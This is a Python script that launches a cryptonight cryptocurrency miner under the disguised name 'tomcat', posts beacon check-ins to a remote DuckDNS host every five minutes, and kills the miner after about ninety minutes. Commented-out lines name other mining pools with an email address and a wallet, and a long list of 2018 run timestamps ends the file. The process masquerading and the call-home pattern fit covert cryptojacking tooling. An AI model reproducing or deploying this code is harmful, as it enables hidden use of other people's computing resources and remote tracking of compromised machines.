import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:12:07.463283
#2018-02-17 15:58:01.314536
#2018-02-17 17:45:08.533747
#2018-02-17 19:33:03.936783
#2018-02-17 21:21:03.246656
#2018-02-17 23:05:05.742923
#2018-02-18 00:52:06.169872
#2018-02-18 02:40:08.891758
#2018-02-18 04:28:05.580591
#2018-02-18 06:19:03.335848
#2018-02-18 08:08:07.139394
#2018-02-18 09:55:04.161678
#2018-02-18 11:42:07.705561
#2018-02-18 13:27:06.134997
#2018-02-18 15:17:06.681438
#2018-02-18 17:06:02.235934
#2018-02-18 18:52:06.367726
#2018-02-18 20:39:05.597711
#2018-02-18 22:25:06.609662
#2018-02-19 00:14:05.086351
#2018-02-19 02:00:09.183535
#2018-02-19 03:47:05.016988
#2018-02-19 05:33:04.767483
#2018-02-19 07:21:04.662079
#2018-02-19 09:09:07.371917
#2018-02-19 10:58:07.541586
#2018-02-19 12:47:05.579207
#2018-02-19 14:36:08.459739
#2018-02-19 16:25:02.918824
#2018-02-19 18:11:07.659016
#2018-02-19 19:58:02.079405
#2018-02-19 21:46:06.918555
#2018-02-19 23:33:03.963495
#2018-02-20 01:18:07.973851
#2018-02-20 03:09:05.497161
#2018-02-20 04:56:04.519798
#2018-02-20 06:40:03.512035
#2018-02-20 08:25:03.941852
#2018-02-20 10:10:09.254922
#2018-02-20 11:54:08.032150
#2018-02-20 13:42:02.188857
#2018-02-20 15:25:06.123613
#2018-02-20 17:10:09.261496
#2018-02-20 19:01:04.674048
#2018-02-20 20:49:06.748381
#2018-02-20 22:33:03.512454
#2018-02-21 00:17:04.958395
#2018-02-21 02:05:01.358008
#2018-02-21 03:52:07.889029
#2018-02-21 05:41:01.941466
#2018-02-21 07:29:07.730000
#2018-02-21 09:14:01.423059
#2018-02-21 11:03:05.055831
#2018-02-21 12:51:08.446867
#2018-02-21 14:40:06.853927
#2018-02-21 16:26:06.138774
#2018-02-21 18:16:07.599543
#2018-02-21 20:03:07.378145
#2018-02-21 21:49:08.045249
#2018-02-21 23:35:06.334328
#2018-02-22 01:23:04.332261
#2018-02-22 03:11:07.678482
#2018-02-22 04:57:03.827638
#2018-02-22 06:40:04.123332
#2018-02-22 08:29:05.773908
#2018-02-22 10:16:07.562242
#2018-02-22 12:00:12.124639
#2018-02-22 13:46:01.559644
#2018-02-22 15:34:08.422063
#2018-02-22 17:20:07.550094
#2018-02-22 19:06:09.602364
#2018-02-22 20:58:05.899839
#2018-02-22 22:43:04.000189
#2018-02-23 00:32:06.251078
#2018-02-23 02:18:06.987327
#2018-02-23 04:07:05.422721
#2018-02-23 05:56:07.582954
#2018-02-23 07:46:06.218960
#2018-02-23 09:48:04.371872
#2018-02-23 11:55:12.160651
#2018-02-23 13:43:10.669638
#2018-02-23 15:32:08.986206
#2018-02-23 17:21:08.241220
#2018-02-23 19:07:07.766240
#2018-02-23 20:53:02.208506
#2018-02-23 22:42:05.433706
#2018-02-24 00:29:08.111936
#2018-02-24 02:20:05.505948
#2018-02-24 04:09:02.079267
#2018-02-24 05:56:07.835864
#2018-02-24 07:43:04.928452
#2018-02-24 09:29:04.813571
#2018-02-24 11:22:05.550531
#2018-02-24 13:11:03.906612
#2018-02-24 15:01:02.255379
#2018-02-24 16:51:05.246384
#2018-02-24 18:39:06.383390
#2018-02-24 20:29:05.758401
#2018-02-24 22:26:01.471403
#2018-02-25 01:35:07.210342
#2018-02-25 05:22:04.230507
#2018-02-25 11:34:06.685479